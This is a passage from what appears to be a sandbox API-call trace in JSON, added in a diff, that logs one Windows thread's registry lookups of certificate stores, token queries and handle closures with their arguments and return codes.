"arguments": [ + { + "name": "Handle", + "value": "0x00000524" + } + ], + "repeated": 0, + "id": 1288 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000524" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000520" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1289 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000524" + }, + { + "name": "KeyInformation", + "value": "\\x1fi\\xffcb\\xfff4\\x0e~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1290 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000524" + } + ], + "repeated": 0, + "id": 1291 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000524" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000520" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1292 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000524" + }, + { + "name": "KeyInformation", + "value": "\\x1fi\\xffcb\\xfff4\\x0e~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1293 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000524" + } + ], + "repeated": 0, + "id": 1294 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767fb900", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1295 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7705c11d", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000524" + } + ], + "repeated": 0, + "id": 1296 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7705c125", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1297 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x767e8775", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1298 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x767e878d", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1299 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ba174", + "parentcaller": "0x768087e5", + "category": "process", + "api": "NtOpenProcessToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "DesiredAccess", + "value": "0x00000008" + }, + { + "name": "TokenHandle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1300 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x76808ab9", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "1" + }, + { + "name": "TokenInformation", + "value": "P\\xee[\\x05\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xaa\tT\\x1e\\xa0\\x13}z\\xa7\\x1b\\x0f\\xf2\\xe9\\x03\\x00\\x00\\xe3>\\xd6\\xfat\\xa1ku\\x88\\x8f's\\xe5\\x87\\x80v+\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\\\x05\\x00\\x00\\x00\\x00l\\xee[\\x05x\\xef[\\x05\\xa4\\xfd[\\x05\\x90c\\x1bst\\xa1ku\\x88\\x8f's\\xe8\\xee[\\x05\\xdb\\x9e\\x06slS%s$\\xb6,s\\xbcA\\x83\\x02\\x88\\x8f's8\\xef[\\x05\\x9b>\\xd6\\xfa\\x1c\\xea[\\x05\\x04\\xa0\\x04s\\xa4\\xfd[\\x05\\x90c\\x1bs\\xdf!\\xab\\x8c\\xfe\\xff\\xff\\xff4\\xef[\\x05\\xe6\\xb5\\x07s9\\x00\\x00\\x00\\xbc\\x9a%s\\xdc\\xb5%s\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd7\\xb5%s\\x9c\\xb3%s\\xff\\xff\\xff\\xff0~%s\\x08\\x00\\x00\\x00\\xc8\\xb5%st\\xef[\\x05\\xdc\\xf1\\x94\\xef4\\xef$\\xef\\x98\\xef\\x00\\x00<\\xff\\x00\\x00\\xdc\\xf1[\\x05\\x94\\xef[\\x05\\x98\\xef[\\x05\\x00\\x00\\x00\\x00H\\xef[\\x05t\\xa1ku\\xff\\xff\\xff\\xff\\x08\\x00\\x00\\x00t\\xef[\\x05" + } + ], + "repeated": 0, + "id": 1301 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x7680880c", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1302 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1303 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000510" + }, + { + "name": "DesiredAccess", + "value": "0x02000000", + "pretty_value": "MAXIMUM_ALLOWED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000002ac" + }, + { + "name": "ObjectAttributesName", + "value": "S-1-5-21-508823978-2055017376-4061076391-1001" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER" + } + ], + "repeated": 0, + "id": 1304 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000524" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000510" + }, + { + "name": "ObjectAttributesName", + "value": "" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\" + } + ], + "repeated": 0, + "id": 1305 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767e86a7", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1306 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000510" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000524" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1307 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000528" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000510" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1308 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000528" + }, + { + "name": "KeyInformation", + "value": "\\xff91\\xffe05\\x04\\x11~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1309 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000528" + } + ], + "repeated": 0, + "id": 1310 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000528" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000510" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1311 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000528" + }, + { + "name": "KeyInformation", + "value": "\\xff91\\xffe05\\x04\\x11~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1312 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000528" + } + ], + "repeated": 0, + "id": 1313 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000528" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000510" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1314 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000528" + }, + { + "name": "KeyInformation", + "value": "\\xff91\\xffe05\\x04\\x11~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1315 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000528" + } + ], + "repeated": 0, + "id": 1316 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767e8258", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1317 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1318 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\Disallowed\\PhysicalStores" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\Disallowed\\PhysicalStores" + } + ], + "repeated": 0, + "id": 1319 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ab678", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1320 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000510" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\Disallowed" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\Disallowed" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1321 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767fa617", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1322 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1323 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Policies\\Microsoft\\SystemCertificates\\TrustedPublisher\\Safer" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\TrustedPublisher\\Safer" + } + ], + "repeated": 0, + "id": 1324 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ba174", + "parentcaller": "0x768087e5", + "category": "process", + "api": "NtOpenProcessToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "DesiredAccess", + "value": "0x00000008" + }, + { + "name": "TokenHandle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1325 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x76808ab9", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "1" + }, + { + "name": "TokenInformation", + "value": "\\xd8\\xef[\\x05\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xaa\tT\\x1e\\xa0\\x13}z\\xa7\\x1b\\x0f\\xf2\\xe9\\x03\\x00\\x00k \\xd6\\xfat\\xa1ku\\x88\\x8f's\\xe5\\x87\\x80v-\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\\\x05\\x00\\x00\\x00\\x00\\xf4\\xef[\\x05\\x00\\xf1[\\x05\\xa4\\xfd[\\x05\\x90c\\x1bst\\xa1ku\\x88\\x8f'sp\\xf0[\\x05\\xdb\\x9e\\x06slS%s$\\xb6,s\\xbcA\\x83\\x02\\x88\\x8f's\\xc0\\xf0[\\x05# \\xd6\\xfa\\xa4\\xeb[\\x05\\x04\\xa0\\x04s\\xa4\\xfd[\\x05\\x90c\\x1bs\\xdf!\\xab\\x8c\\xfe\\xff\\xff\\xff\\xbc\\xf0[\\x05\\xe6\\xb5\\x07s9\\x00\\x00\\x00\\xbc\\x9a%s\\xdc\\xb5%s\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd7\\xb5%s\\x9c\\xb3%s\\xff\\xff\\xff\\xff0~%s\\x08\\x00\\x00\\x00\\xc8\\xb5%s\\xfc\\xf0[\\x058\\xf3\\x1c\\xf1\\xbc\\xf0\\xac\\xf0 \\xf1\\x00\\x00<\\xff\\x00\\x008\\xf3[\\x05\\x1c\\xf1[\\x05 \\xf1[\\x05\\x00\\x00\\x00\\x00\\xd0\\xf0[\\x05t\\xa1ku\\xff\\xff\\xff\\xff\\x08\\x00\\x00\\x00\\xfc\\xf0[\\x05" + } + ], + "repeated": 0, + "id": 1326 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x7680880c", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1327 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1328 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000510" + }, + { + "name": "DesiredAccess", + "value": "0x02000000", + "pretty_value": "MAXIMUM_ALLOWED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000002ac" + }, + { + "name": "ObjectAttributesName", + "value": "S-1-5-21-508823978-2055017376-4061076391-1001" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER" + } + ], + "repeated": 0, + "id": 1329 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000510" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Policies\\Microsoft\\SystemCertificates\\TrustedPublisher\\Safer" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\SystemCertificates\\TrustedPublisher\\Safer" + } + ], + "repeated": 0, + "id": 1330 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x7680d334", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1331 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1332 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\TrustedPublisher\\Safer" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\TrustedPublisher\\Safer" + } + ], + "repeated": 0, + "id": 1333 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ab678", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1334 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000510" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\Disallowed" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\Disallowed" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1335 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + 